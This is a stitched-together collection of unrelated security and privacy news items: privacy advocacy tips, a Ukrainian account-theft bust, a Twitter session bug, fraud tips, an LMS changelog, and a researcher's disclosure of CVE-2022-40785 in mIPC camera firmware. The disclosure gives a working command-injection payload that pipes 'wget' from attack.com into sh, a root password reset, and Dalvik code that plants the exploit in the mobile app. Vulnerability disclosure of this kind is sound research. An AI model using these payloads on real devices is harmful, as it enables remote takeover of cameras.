Want to speak up against Big Tech, unjust data collection, and surveillance? Here's how to be an activist in your community and beyond.

Your Facebook is no longer a naked-to-the-public firehose of information about your family and social life. Your mobile phone is as do-not-track as you’re able to function under. You cover your webcam lens when it’s not in use.

In short, you’ve done what you can to mitigate the way the current world seeks to share and expose your personal information. It takes energy and knowledge to break away from the default settings of digital devices, social networks, and retailers seeking more, more, more information. But you’ve done it, at least what you can. You feel pretty good about safeguarding some (but not all) of your private data and being proactive about it.

So what’s this nagging feeling in the back of your skull? Do you sometimes feel like you could be doing even more in the battle to protect citizens from the overreach of data scrapers and tech moguls who value monetization over individual rights?

It takes a lot of committed people to fight these battles in courtrooms, in the digital marketplace, and on the platforms themselves (Facebook, Twitter, and LinkedIn, among others) that have become battlegrounds for our data. You could be one of these people: an advocate for data privacy who is actively involved in helping protect us all.

Advocacy Near Home

Getting your own house in order in regards to privacy could mean literally getting your house in order. Setting up a VPN (virtual private network) service for your entire household, for instance, can offer your entire family a shield to prying eyes online, including threats from hackers, although finding a reputable one with strong data privacy policies that also won’t scoop up your data can itself be a challenge.

If you have kids old enough to join social networks (the legal age is 13 in the US), take the time to help them set up and understand their privacy settings, especially on social networks that have a poor track record on that front (such as Facebook and TikTok). The same goes for online game networks they might play on such as Nintendo Online or the PlayStation Network, not to mention popular games like _Roblox_ and _Minecraft_ (which is owned by Microsoft, who also operates Xbox Live, which also has social features).

Similarly, stay in the loop on new policies and legal changes that could affect the way companies handle your kids’ data. You should also learn how your kids’ school and school district handle issues such as data on school devices, software in schools, and surveillance cameras on campus.

You don’t want to be the person who posts hoaxes about how Facebook is going to use your photos and information, but spreading the word from legit sources to extended family and friends about good privacy hygiene is one way to raise awareness of the problems that exist. The United States Privacy Digest from the International Association of Privacy Professionals, The Hacker News, Privacy International, and—not to toot our own horn—WIRED’s own coverage of privacy issues are good places to get informed or search for specific stories around these topics.

Take Your Advocacy Public

The Electronic Frontier Foundation (or EFF) is a civil liberties nonprofit founded in the San Francisco Bay Area in 1990. It’s been carrying the torch for fighting threats to free speech and privacy ever since. The EFF says it has seen a recent “big uptick” in interest from people wanting to protect privacy on their phone; for instance, there are 100,000 views on a post about disabling Ad ID on iOS and Android devices. “We are clearly seeing that people are increasingly concerned about digital rights,” says Karen Gullo, analyst and senior media relations specialist at EFF. 

The organization offered WIRED a list of things you can do if you’d like to get more involved in advocating for data privacy.

To start with, find out where your local and state lawmakers stand on privacy and make your own voice heard. Call or email them, or speak up at town halls and other meetings. “Check with your local city council to see if they have a committee that is looking into data-privacy issues, or suggest that they form one,” says Karen Gullo, analyst and senior media relations specialist at EFF. “Ask for a citizen advocate to be part of that committee.”

You could also form your own committee, briefing those local officials on data policies and threats, and informing the public with talks at local libraries and other public locations. The EFF pointed to Oakland Privacy, a citizen’s coalition that succeeded in this kind of effort; the group helped get an ordinance passed requiring towns in its area to be transparent about surveillance technology.

The EFF is currently pushing the My Body, My Data Act, which would protect personal health care data related to reproductive rights. You can learn how to take action to support this act on the EFF’s website.

Similarly, the Electronic Frontier Association itself is comprised of grassroots digital-rights advocacy groups in cities and campuses across the country, and they may be looking for volunteers in your area. You can get involved with security training projects and educational events through an existing chapter, or by starting your own coalition.

How to Advocate for Data Privacy and Users' Rights

By Waqas
According to the Ukraine Security Service (SSU), the hackers were selling the hacked accounts to "Russian propagandists" through the dark web.
This is a post from HackRead.com Read the original post: Ukraine Busts Pro-Russia Hackers Who Stole 30M Accounts of EU Citizens

Ukraine Security Service (SSU) has confirmed the dismantling of a cyber criminal gang that stole the personal accounts of nearly 30 million individuals in Ukraine and across Europe.

According to SSU, its cyber unit has taken down a gang of cybercriminals responsible for stealing 30 million accounts and offering the data on the dark web for sale. The department stated that the hacking group earned around UAH 14 million ($375,000) from selling these accounts.

During the search operations at the suspects’ residences, police seized several hard-magnetic disks that stored the personal data of the victims. They also seized different computer devices, such as flash drives, SIM cards, and mobile phones.

Seized material

**Hack Details**

As per initial research into the attack, the hackers breached the user accounts and sold their confidential information, including credentials and sensitive personal data, on a dark web platform via an anonymous account. They used electronic payment systems, including WebMoney, YuMoney, and Qiwi, to receive the payment for the accounts.

These services are banned in Ukraine. Furthermore, the gang of hackers included many suspects from west Ukraine’s largest city. It is unclear how many hackers were arrested and which services were attacked.

1.  Ukraine Leaks Personal Details of 620 Alleged FSB Agents
2.  IT Army of Ukraine and Anonymous hacks the Russian Yandex taxi app
3.  Ukraine Thwart Russian Industroyer 2 Malware Attack on Energy Provider
4.  Personal Data of Tens of Millions of Russians and Ukrainians Exposed Online
5.  DDoS App Meant to Hit Russia Infected Android Phones of Ukrainian Activists

**Attack Launched by “Pro-Kremlin Propagandists”**

As per the SSU’s press release, the hackers are believed to be linked with pro-Russia propagandists. They primarily targeted Ukrainian citizens and people in Europe to harvest the private information of unsuspecting users. They later sold their data on the illegal platform through numerous payment portals.

The propagandists purchased these accounts to spread chaos and panic in the region through disinformation campaigns and to encourage wide-scale destabilization in Ukraine through fake news.

> “Suspects impersonated ordinary people to spread disinformation about the socio-political situation in Ukraine and the EU.”
> 
> Ukrainian Security Service

**More Dark Web News**

1.  What Are Dark Web Search Engines and How to Find Them?
2.  8 Online Best Dark Web Search Engines for Tor Browser (2022)
3.  DeepDotWeb admin pleads guilty to money laundering, kickbacks
4.  142 Million MGM Resorts Records Leaked on Telegram for Free Download
5.  CIA Wants Russians to Share Secrets with the Agency via its Darknet Site

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Ukraine Busts Pro-Russia Hackers Who Stole 30M Accounts of EU Citizens

Unsanitized input when setting a locale file leads to shell injection in mIPC camera firmware 5.3.1.2003161406. This allows an attacker to gain remote code execution on cameras running the firmware when a victim logs into a specially crafted mobile app.

\# mIPC firmware RCE By Joshua Wang Firmware version: v5.3.1.2003161406 (latest?) ## Overview Unsanitized input when setting a \`UTC(\\+|\\-).\*\` locale file leads to shell injection. A stack-based buffer overflow also exists. This allows an attacker to gain remote code execution, but requires the attacker to be authenticated in the mobile application to interface with the camera running mIPC. ## Vulnerability After receiving a firmware dump of a Lefun camera, which runs mIPC firmware, I noted the following in the startup process: - telnetd is killed - the root password is randomized and effectively un-bruteforceable I turned to searching through the mIPC binary for calls to \`system\`, looking for possible injections. The mIPC mobile application allows one to choose the timezone that the camera's system should operate with. I believe this is used for the on-screen display's time feature. One thing that stood out to me is that the firmware dump also included various different locale files for setting a timezone. \`\`\` ./backupfs/apps/app/ipc/data/cfg/zoneinfo/ ├── UTC+00\_00 ├── UTC+01\_00 ├── UTC-01\_00 ├── UTC+02\_00 ├── UTC-02\_00 ├── UTC+03\_00 ├── UTC-03\_00 ├── UTC+03\_30 ├── UTC-03\_30 ├── UTC+04\_00 ├── UTC-04\_00 ├── UTC+04\_30 ├── UTC-04\_30 ├── UTC+05\_00 ├── UTC-05\_00 ├── UTC+05\_30 ├── UTC+05\_45 ├── UTC+06\_00 ├── UTC-06\_00 ├── UTC+06\_30 ├── UTC+07\_00 ├── UTC-07\_00 ├── UTC+08\_00 ├── UTC-08\_00 ├── UTC+09\_00 ├── UTC-09\_00 ├── UTC+09\_30 ├── UTC-09\_30 ├── UTC+10\_00 ├── UTC-10\_00 ├── UTC+10\_30 ├── UTC+11\_00 ├── UTC-11\_00 ├── UTC+12\_00 ├── UTC+13\_00 └── UTC+14\_00 \`\`\` The vulnerable function is found at offset \`0x0013e91c\`. I re-labeled and re-typed the decompilation in Ghidra. \`\`\`c int choose\_utc\_timezone(undefined4 param\_1,char \*param\_2) { int iVar1; char \*pcVar2; char acStack192 \[128\]; char acStack64 \[40\]; if (param\_2 == (char \*)0x0) { iVar1 = -1; } else { strcpy(acStack64,param\_2); pcVar2 = strchr(acStack64,0x3a); if (pcVar2 != (char \*)0x0) { \*pcVar2 = '\_'; } iVar1 = access("/etc/TZ",0); if (iVar1 == 0) { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/TZ; cp /etc/TZ ../data/; ", acStack64); system(acStack192); } else { sprintf(acStack192, "cp ../../../apps/app/ipc/data/cfg/zoneinfo/%s /etc/localtime; cp /etc/localtime ../ data/; " ,acStack64); system(acStack192); iVar1 = 0; } } return iVar1; } \`\`\` It appears that the name of a timezone filename is passed in through \`param\_2\`. It is then strcpy'd to \`acStack64\`. Then, it is formatted into a shell command using \`sprintf\` and then passed to \`system\`. The command copies a selected locale file from the previously mentioned directory into \`/etc/TZ\`, effectively setting the locale. It is important to note that mIPC by default uses another method to set a timezone besides copying a locale file, but these were not (to my knowledge) vulnerable due to sanitization. In this function, we can see two vulnerabilities. First, the \`strcpy\` allows us to copy more than 40 bytes into \`acStack64\`. One may argue that a length check occurred outside of this function, but I verified it experimentally and it indeed crashed the binary. Second, we can command-inject our way into the system! We just need our input to start with a valid locale filename (\`UTC+01\_00\`, etc) in order for the binary to reach this function (I also verified this experimentally). I could not find the parent calling function, but it may be that the developer used a \`strncmp\` and only verified the first couple bytes of input to match a valid locale filename. ## Exploitation I decided to exploit the command injection. Using APKtool, I dumped the mIPC mobile application and reverse engineered the behavior that sets timezones. I first instantiated a \`mcld\_ctx\_time\_set\` object. The definition for it: \`\`\` .class public Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; .super Lcom/mining/cloud/bean/mcld/mcld\_ctx; .source "mcld\_ctx\_time\_set.java" # instance fields .field public auto\_sync:I .field public day:I .field public hour:I .field public min:I .field public mon:I .field public ntp\_addr:Ljava/lang/String; .field public sec:I .field public timezone:Ljava/lang/String; .field public type:Ljava/lang/String; .field public year:I # direct methods .method public constructor <init>()V .locals 0 .line 6 invoke-direct {p0}, Lcom/mining/cloud/bean/mcld/mcld\_ctx;-><init>()V return-void .end method \`\`\` The locale filename (\`param\_2\`) is expected in the \`timezone\` field. Because of the buffer overflow, we are constrainted to < 40 characters in this injection, including the bytes at the beginning for a valid locale filename. Otherwise, we will crash the mIPC binary. To circumvent this, I decided to host my actual payload on a remote server, and execute it by calling \`wget\` and piping the output into \`sh\`. This gives me unlimited access to the shell. I set: - type == \`NTP\` - timezone == \`UTC+01\_00;wget -qO- attack.com|sh #\` - auto\_sync = 1 - sn == a serial number I got from calling \`McldActivityLivePlay->mSerialNumber\` - handler == \`McldActivityLivePlay->customTimeSetHandler\` I then invoked \`mcld\_agent->time\_set\` with this object and a couple other retrieved configurations to set the locale. See \[here\](#Full-payload) for the full thing. My remote payload just consisted of changing the root password with \`echo "root:root" | chpasswd\` and starting telnetd. Recall that the root password is randomized on startup. To make it easier for my coworker, Chris, to collect data (we were remote), I embedded my exploit into the \`onCreate\` method of the \`McIdActivityLivePlay\` class. This meant as soon as someone views the camera, the attack is run. I re-compiled the application with apktool, signed it, and installed it via ADB. !\[\](https://i.imgur.com/fBdlPHf.png) ## Full payload I learned way too much about Dalvik. \`\`\` new-instance v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set; invoke-direct {v1}, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;-><init>()V const-string v2, "NTP" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->type:Ljava/lang/String; const-string v2, "UTC+01\_00;wget -qO- attack.com|sh #" iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->timezone:Ljava/lang/String; const/4 v2, 0x1 iput v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->auto\_sync:I iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mSerialNumber:Ljava/lang/String; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->sn:Ljava/lang/String; iget-object v2, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->customTimeSetHandler:Landroid/os/Handler; iput-object v2, v1, Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;->handler:Landroid/os/Handler; iget-object v3, p0, Lcom/mining/cloud/activity/McldActivityLivePlay;->mApp:Lcom/mining/cloud/application/McldApp; iget-object v3, v3, Lcom/mining/cloud/application/McldApp;->mAgent:Lcom/mining/cloud/mcld\_agent; invoke-virtual {v3, v1}, Lcom/mining/cloud/mcld\_agent;->time\_set(Lcom/mining/cloud/bean/mcld/mcld\_ctx\_time\_set;)V \`\`\`

CVE-2022-40785: mIPC firmware RCE - HackMD

Categories: News
Categories: Privacy
Twitter says it has fixed a bug that meant users weren't logged out of active sessions on all devices after manually resetting their passwords. 



(Read more...)




The post Twitter fixes bug that left devices logged in after password reset appeared first on Malwarebytes Labs.

Twitter says it has fixed a bug that meant users weren't logged out of active sessions on all devices after manually resetting their passwords. 

Writing on its blog, Twitter said:

> "We want to let you know that we recently fixed a bug that allowed Twitter accounts to stay logged in from multiple devices after a voluntary password reset. In order to help ensure the safety and security of everyone that may have been affected, we've proactively logged people who may have been affected out of active sessions."

Staying logged in on multiple devices after explicitly changing an account password is a huge security risk. If someone has breached an account already, that would leave them logged in and able to impersonate the user, rummage through DMs, change the password again, and more. 

Twitter says it has logged out all affected users, everywhere.

> We fixed a bug that didn't close all active logged in sessions on Android and iOS after an account's password was reset. To keep your account safe, we logged some of you out. You can log back in to keep using Twitter.
> 
> For more details on what happened: https://t.co/OmjLKOe5bs
> 
> — Twitter Support (@TwitterSupport) September 21, 2022

Twitter says it has reached out to users who might have been affected by the bug. For everyone else, it's business as usual.

Twitter fixes bug that left devices logged in after password reset

Academy Learning Management System before v5.9.1 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the Search parameter.

Academy Lms is a marketplace script for online learning. Here students and teachers are combined together for sharing knowledge through a structured course-based system. Teachers or instructors can create an unlimited number of courses, video lessons and documents according to their expertise and students can enroll in these courses and make themselves skilled anytime and from anywhere.  
So start selling your courses by installing ACADEMY and make your online business today.  

**Quick start guide for course instructor/admin**

*   Read all our provided documentation carefully before using the software
*   Install the application following “Installation and Update” guide carefully
*   Login as site administrator to organize your system
*   At first update your System Settings and Payment Settings from Settings option of the left sidebar menu. Also, make sure to provide a valid YouTube API key and a valid Vimeo API key on System Settings.
*   If you have updated the Settings successfully, you can go to Categories option from the same left sidebar menu and create Categories.
*   After creating Category, you can create Sub-categories under a specific Category. For creating Sub-categories you can go to the Categories page, select a specific category, click on the Action dropdown menu and select Manage Sub-categories. It will take you to the Sub-categories page. Now you can simply click on “+Add Sub Category” button and fill all the required fields to create a Sub-category.
*   Now its time to create some Courses. Since a course will contain all the video lessons you have to create it carefully. Move to Courses option from the left menu, You will get a “ Add Course Form” after clicking on “+Add Course” button. Fill all the fields carefully
*   Every Course should have at least one Section. Because at the end you will have to add a lesson under a specific section of a specific course. So, now you will have to create at least one section. Move to the Courses page, select a specific course, click on the action dropdown menu and select Manage Section. After clicking on Manage Section you will get the list of Section which is empty now. You have to create one by clicking the “+Add Section” button
*   As you have created a Course and a section or multiple sections, now you will be able to create a lesson. Now, let’s move to the Course page again, select a specific course, click on the Action dropdown button, select Manage Lesson. It will also show the list of lessons that you’ve created. To add new you can just click on “+Add Lesson” button

**Quick start guide for course students**

*   Since the application has been already installed. Student can access the website by simply hitting the application URL
*   Home page will appear every time a student hits the URL. From the home page, a student can search for a specific course, get all the top courses, top ten latest courses, get category based courses. A student can sign up if he/she is not registered yet. If a student is already registered he/she can log in. Student can add courses on their Shopping Carts or add them on their Wishlists
*   Students can see the course details by simply clicking on a course thumbnail. The course details page contains all the essentials information about a course like, Title, Description, Outcomes, The prerequisites of the course, Lesson list Instructor details, and the rating and reviews. User can see a course overview here
*   If Student want to buy the course they must add those courses on their cart
*   After adding a course on Shopping cart if a student wants to see their cart items, they can to go to the Shopping Cart page by clicking on Go To Cart button, which appears on hovering over the cart icon of the header
*   Student can remove courses if they want from the shopping cart page
*   On the right side of the shopping cart page is the total price of the cart items. Under that is the Checkout button. If student want to check out they can simply click on the Checkout button and pay for those courses
*   After a successful checking out student can see their courses on the My Courses menu. The student will get the My Courses button by hovering over their profile image from the header
*   My Courses page will show all the courses which are purchased by that student. Student can play the lessons by clicking on the thumbnail from the My Courses page

**Update Log**

**Version 5.9.1 – 16 August, 2022**

\- Home page newly designed
- Footer newly designed
- Sign up URL enhanced to improve SEO
- The uploaded images are optimized automatically
- Footer link issue fix
- Auto logout issue fix

**Version 5.9 – 3 July, 2022**

\- Pagination added to the search result page
- Pagination added to the course filter page
- Search result optimised from in dept course data
- Quiz result issue fixed and experience improved

**Version 5.8 – 26 May, 2022**

\- New! limitation on account access from multiple devices
- Admin can set how many account can be accessed by a single student account
- Create any number of new pages for your course website
- Video uploading progress bar shown during lesson creation
- Quiz question type added: true-false, fill in the blanks, multiple choice, single choice
- Instructor now can view student's quiz results
- Quizzes now have timer to complete within a certain time period
- Login session time period extended
- Issue fix for blog category link access
- Smtp crypto settings now added

**Version 5.7 – 18 April, 2022**

\- Drip content feature introduced
- Student has to complete previous lesson to access the next one
- Showing learning progress in course playing page
- Publicly course access permission settings (allow/deny) from admin panel
- Message read and unread status showed in messaging page between student and instructor
- Certificate addon update: drag & drop builder
- Certificate addon update: background image changing capability
- Certificate addon update: QR code shown for certificate validation

**Version 5.6 – 17 February, 2022**

\- Api updated for student and instructor mobile app
- Show email with name when admin enroll a student
- Delete enrolment history when a course is deleted
- Blog keywords for course website SEO performance enhance
- Minor bug fixed

**Version 5.5 – 19 January, 2022**

\- Blog module introduced
- Admin & instructor can write blog posts
- 'Buy' button added in course page
- Instructor skills added
- New page for forget password
- Newly designed user interface for student account panel
- Document type lessons now have preview option
- Coupon code discount feature enhanced
- Razorpay payment gateway option for instructor payout
- Store quiz result of students
- Api updated for mobile apps
- Source code optimised and performance upgraded

**Version 5.4 – 2 November, 2021**

\- Updated with bootstrap 5
- Completely newly designed frontend website layout

**Version 5.3 – 16 September, 2021**

\- Student can continue learning from last time viewed lesson (watch history preserved)
- When purchasing a course without login, redirected to that course after login.
- The video source URL has been hidden for HTML5 video URL and Video file.
- Added language select option to instructor panel.

**Version 5.2 – 30 August, 2021**

\- New lesson type: text format
- Facebook login for students added
- Admin permission for quick action menu fixed
- Refund policy option settings added

**Version 5.1 – 4 August, 2021**

\- New lesson type: google drive
- Razorpay payment gateway comes as standard
- Free lesson preview

**Version 5.0 – 1 June, 2021**

\- Adding new admins
- Admin role permission setting
- Multi instructor in single course
- Coupon code
- Course compare feature
- Application performance improvement
- Organised Admin navigation menu
- Organised applications assets
- Documentation updated

**Version 4.7 – 8 May, 2021**

\- Responsive issue solved on the course playing page.
- Bug fixed on social sharing content.
- A new API has been added for the Instructor mobile app.

**Version 4.6 – 23 March, 2021**

\- Sub category selection fixed for mobile device screens.
- Minor bug fixes
- Performance improvement

**Version 4.5 – 9 February, 2021**

\- Ability to filter courses according to parent categories.
- Security check on installing addons.
- Course preloaded on homepage. 
- Fixed a minor bug on course completion.

**Version 4.4 – 22 December, 2020**

\- Google recaptcha introduced for enhanced account security
- Dashboard shortcut for : Add student, Enrol student, Add course, Add lesson
- Mobile API updated
- Layout updated in course detail page for mobile device responsiveness.

**Version 4.3 – 20 October, 2020**

\- Browser cache issue on image uploading has been solved.
- Ratings and reviews are now showing perfectly on mobile device.
- Server storage has been optimised by removing the previous video file while updating video type lessons.
- Stripe payment API is working fine in Academy mobile app.
- Top courses are now accessible from mobile devices.
- Latest courses are now accessible from mobile device.
- Info banner is now aligned perfectly in mobile device.

**Version 4.2 – 15 September, 2020**

\- Sending verification code instead of link on user verification email. Since sometimes mail with a link considered as suspicious.
- Keeping stripe session id and transaction id on stripe payment.        
- Enhanced the security of stripe payment.
- Total lesson count is now working fine in all dashboard.   
- Minor bug fixes and performance improvement.

**Version 4.1 – 19 August, 2020**

\- All payment gateways are included in mobile app.
- Students can purchase course inside mobile app using all available payment gateways and addons.
- Rating review posting by student random issue fix
- Version update procedure updated

**Version 4.0.1 – 6 July, 2020**

\- Stripe payment gateway updated for course purchase
- Api updated for mobile application
- Minor bug fixes

**Version 4.0 – 17 June, 2020**

\- New instructor workflow introduced
- Admin can add new instructor from admin panel
- User needs to apply to be an instructor if the admin keeps it enabled
- New dashboard and menu for instructor panel
- New sales report page for instructor
- New payout report page for instructor
- New instructor payout processing system
- The instructor now have the opportunity to request a withdrawal request
- Language switcher from frontend website
- New lesson creation layout and very user-friendly workflow
- A separate form for each type of lessons and it can be switched instantly
- Video upload option in lesson creation form with possible upload size info
- Toaster notification translation issue fixed
- Student page title issue fixed
- Lesson deletion issue while course deletion is fixed
- Multi-language helper updated
- Courses can be added to wishlist from course detail page
- User is shown an alert before removing a course from wishlist
- Outgoing email text enhanced for being marked as spam by Gmail

**Version 3.6 – 23 April, 2020**

\- Iframe embed code feature added.
- Now you can add google slide, slideshare slides and any embeddable external content.

**Version 3.5 – 8 April, 2020**

\- Minor bug fixes.

**Version 3.4 – 20 March, 2020**

\- Android API added to purchase a course from inside the student's mobile app.

**Version 3.3 – 10 March, 2020**

\- Checkout page updated

**Version 3.2.1 – 1 March, 2020**

\- Academy lms site slow speed performance fixed

**Version 3.2 – 19 February, 2020**

\- Payment system upgraded and designed from scratch
- Disabled payment gateways are now hidden from student course purchase page
- Some minor bug fixes in course, lesson management in the admin panel

**Version 3.1 – 15 January, 2020**

\- EU cookie note added with cookie policy acceptance
- Course purchase notification to instructor, admin, student
- Disabled payment method is now inactive in course purchasing cart
- Instructor list is shown in the admin panel
- API updated for mobile app course purchasing
- Enroll history report updated to current month by default
- Addon system introduced
- New addon manager for addon installation, activation or deactivation
- Certificate addon released. Buy here: https://codecanyon.net/item/x/25515213
- Documentation updated

**Version 3.0 – 12 October, 2019**

\- Android app API published
- Separate video lesson configuration for mobile app added
- Lesson player CSS fixed
- Footer text made dynamic from admin panel
- Course curriculum layout issue fixed
- Course duration value fixed
- Course title short layout enhanced

**Version 2.4 – 17 September, 2019**

\- User interface updated

**version 2.3 – 12 August, 2019**

\- Course progress feature added for students
- Students can mark / unmark a lesson as complete
- My course page shows completion percentage of every purchased course
- Video lessons can be resumed from last time watched ( applicable for .mp4 videos )

**version 2.2 – 10 July, 2019**

\- Course playing page new layout introduced. Designed and coded from scratch.
- Theme installation option added.
- Theme chooser, activation and deactivation option added.

**version 2.1 – 16 June, 2019**

\- stripe payment gateway api updated
- admin now have option to enable or disable email verification
- course purchasing cart page crash issue fixed

**version 2.0 – 10 June, 2019**

\- quiz module introduced
- MCQ question manager for course quiz
- quiz sorting option added
- new course manager layout
- course filter for admin to sort out easily
- courses and section now grouped in a single page
- brand new admin panel layout
- admin now have monthly income graph chart
- new instructor dedicated panel introduced
- category manager updated
- new course filter page added in frontend website
- courses can be filtered by category, price, level, language, rating
- filter course with list view and grid view
- all user login page unified in a single form
- new website launched for academy : http://www.academy-lms.com

**version 1.3 – March, 2019**

\* Free course enrolment opportunity
\* Confirmation email on student account register
\* Custom smtp settings for site admin
\* Stopped playing course preview on background
\* Shopping cart view updated
\* Minor bugs fixes

**version 1.2 – January, 2019**

\* Lesson file type added : text, pdf, doc, own server video
\* Description field for all course lessons
\* Video player updated and enhanced 
\* Added course title/summary to course playing page
\* Course activation notification updated.
\* Site title issue fixed
\* Seo settings for course pages
\* Added currency settings

**version 1.1 – November, 2018**  
\[ backend \]

\* Status Wise course creating.
\* Show number of courses by status on Dashboard as well as on Admin navigation menu.
\* Made managing sub-category more comprehensive on the category page.
\* Added icon picker on Category and subcategory add and edit form
\* Added an instructor filter on course table.
\* Separated Active and Pending courses status wise inside the course page.
\* Admin now has an option of “View Course on Frontend” inside course page.
\* Admin now can make a course Active as well as Pending.
\* Made Course overview URL optional while creating a course.
\* Made Course thumbnail optional while creating a course.
\* Made generating Lesson’s video duration more understandable. 
\* Added an optional Payment information field for Student. While creating and editing student. It is required for Instructors only.
\* Added Enrol a Student option. Now admin can enrol a student manually from the backend.
\* A new navigation menu “Report" has been added. 
\* Admin now can see all the revenue he got after a successful course purchasing.
\* Admin now can see all the revenue an Instructor got after a successful course purchasing.
\* Admin now can pay instructors.
\* Made Updater module functional for future updates.
\* Added two different Logo Uploader. One for backend another for Frontend.
\* Added Favicon uploader.
\* Added Instructor settings inside Settings option.
\* Fixed the “Action” Button breaking on small devices.
\* Dynamic footer text.

\[ frontend \]

\* Showing all the courses by course status. That means only Active courses are now being shown.
\* Fixed the login modal’s title.
\* Wish listed courses are now can be removed from the wish list page.
\* Already Purchased Button now redirects to My Courses page.
\* Fixed the issue of courses with no course overview URL or course thumbnail.
\* Instructor can see his course’s curriculums from the Course details page.
\* Respective instructor details of every course is showing on course details page.
\* Fixed the escape HTML tags issue on instructor Biography.
\* Added Instructor menu on the frontend navigation.
\* Creating course from the frontend.
\* Separated Active, Pending and Drafted course on instructor dashboard.
\* Instructor can see his created course details and respected course’s lessons from the frontend.
\* Instructor can make a published course to Draft course.
\* Instructor can create, update and delete sections from the frontend.
\* Serialize sections from the frontend.
\* Can Add, Update or Delete lessons from the frontend.
\* Instructor’s Payment report on the frontend.
\* Payment settings. Which is mandatory for being an Instructor.

**version 1.0 – October, 2018**

\- first version released

**Requirements**

*   Apache web server for running php
*   PHP version 7
*   Mysql database access, purchase code during installation
*   Php curl should be enabled
*   One purchase code is legal for using one domain only

**Contact support**

Send us a ticket for presale questions and getting after sales developer support via zendesk.  
http://support.creativeitem.com

CVE-2022-38553: Academy Learning Management System

By Owais Sultan
Although online fraud includes identity theft, phishing scams, and viruses, there are steps that can be taken to protect against them. Let's dig into the whats and hows of it.
This is a post from HackRead.com Read the original post: 5 Online Fraud Fighting Tips for Novices

Navigating the online sphere can be a big challenge, particularly if you are someone not overly clear on what the threats are and how to target them. If you fall into this category and want to take steps to increase your online safety and reduce the risk of fraud, here are some key tips to follow.

**1\. Stay up-to-date with the ever-changing phishing scams.**

The ways criminals try to get their hands on your information and cash are constantly evolving. Every time companies and consumers take steps to close loopholes; they come up with ever-evolving workarounds. Some scams you can fall prey to are incredibly sophisticated, meaning even the savviest individual might be convinced. They can mimic company websites exactly, fake email addresses and phone numbers, and can use sophisticated techniques to get information out of you.

As a consumer, you must stay on top of what kind of scams are being used, and you prepare yourself to look out for them. You can use many different blogs and online sites, and you can find a wealth of information on sites like Reddit and even Facebook, as well as by using Google. Arming yourself with the knowledge to weed out the crooks and protect yourself is one of the best things you can do when fighting online fraud.

**2\. Install IP lookup tools on your websites/blogs to trace bad actors and traffic (LI)**

If you have your own website or blog page, you might be aware that bad actors and bots enjoy causing trouble. This can come in the form of offensive comments, spam, or overloading your website, causing downtime and crashes. It can also mean hackers target your site to gain access and take it over.

An IP lookup tool is an excellent solution for those who are not overly tech-savvy: it allows the website owner to have oversight of each visitor to the site based on their IP address. In addition, this tool can assess the validity of an IP address, check addresses against blacklists of spammy content, and detect proxy servers, geolocation, domain, and hostname.

These kinds of tools can be used on their own or in conjunction with other methods to understand more about visitors to a site and to help fight back against fraud. An IP lookup tool is a great place to start for those who want to protect their websites, businesses, or other visitors.

**3\. Create secure passwords – regularly change them.**

One of the most common ways nefarious actors gain access to your accounts is not through any kind of high-tech hacking. It is done, simply by guessing your password. According to CNBC, the world’s most popular and most-used passwords are qwerty, password, 12345, and various similar combinations. Many will also use things like their maiden name, which can easily be found online, famous musicians, or footballers’ names. These can be easy for criminals to guess, mainly if they know something about the user. The other issue is that once we have a password, we don’t change it often enough.

To make matters worse, we reuse the same password across multiple platforms, meaning once a criminal has accessed one account, they can access all of them. This is a significant problem and can result in considerable losses and financial detriment to unsuspecting public members. The best way to avoid situations like this is to create secure passwords, change them regularly, and have a different one for each account.

Online password generators can create strong and unique passwords for you, which can then be used for each account. You should try and change your password every three months, four as a maximum. An easy way to remember to do this is by when you change your password to something substantial, scheduling a calendar reminder to change it three to four months in the future. This is one of the best ways to ensure your accounts remain safe and secure.

**4\. Know who is asking**

Many of us are inundated with emails, SMS, and even phone calls that ask us to reveal personal information or follow links to confirm our details. In the vast majority of cases, these will be false and created by criminals who want to trick you.

Any reputable company will not ask you to reveal personal information over the phone or via email. Furthermore, you should be wary of any communications asking you to reset your password, confirm card details, or hand over other information.

The best advice is to deal with each of these requests with suspicion. First, check the email address or number that is being sent- you can search online to see if they have been flagged as suspicious.

Also, make sure they match up with other correspondence from the company. Then, contact the company yourself via the number or email you have used to get them previously and try to verify the recent communication. If possible, send a copy to customer service or your account manager so they can let you know if it is legitimate or not. 

**5\. Protect your devices **

In 2022, most of us will have a range of electronic devices that we use to access the internet and carry out various tasks. These include mobile phones, tablets, laptops, PCs, Smart TVs, eReaders such as Kindle, smartwatches, and home assistants. Many of these devices require us to link them to email accounts, cards, and payment gateways.

We also regularly give them our personal data such as names, addresses, logins and passwords, photos, videos, mobile numbers, and even preferences. This kind of information, if it ends up in the wrong hands, can be devastating, as ICO.org notes.

It can result in identity theft, fraud, and other issues, costing a lot of time, money, and peace. To combat this, it is necessary to take steps to secure and protect your devices. For example, ensure every device you have is secured with a strong password, biometrics, and two-factor authentication. You should also be cautious about logging out of specific devices and accounts on devices when not in use.

It is also worth looking at various security software and anti-virus products that can provide additional protection to you and your data. There are many options on the market that are both easy to use and affordable. Last but not least, many devices such as mobiles, tablets, and PCs have inbuilt software that can assess security for any loopholes or imminent risks, notifying you of steps you need to take to fix them.

1.  US military personnel defrauded into losing $822m through scams
2.  170 fraudulent Android apps scamming cryptocurrency enthusiasts
3.  12 years jail for man who unlocked phones, defrauded AT&T of $200m
4.  Microsoft Warns of Evolving Toll Fraud Android Malware Draining Wallets
5.  Researchers warn of new Rug Pull scam through fraudulent crypto tokens

5 Online Fraud Fighting Tips for Novices

Categories: News
The most important and interesting computer security stories from the last week.



(Read more...)




The post A week in security (September 19 – 25) appeared first on Malwarebytes Labs.

twitter

facebook

linkedin

Youtube

instagram

Cybersecurity info you can't do without

